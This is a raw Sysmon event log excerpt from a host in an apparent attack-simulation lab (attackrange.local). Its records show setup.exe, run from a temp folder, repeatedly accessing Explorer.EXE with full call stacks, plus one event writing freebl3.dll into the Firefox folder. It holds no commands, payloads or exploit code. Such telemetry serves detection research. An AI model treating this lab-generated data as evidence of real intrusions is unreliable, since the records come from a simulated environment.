13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\freebl3.dll2021-01-18 13:59:52.349 10341000x800000000000000014850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 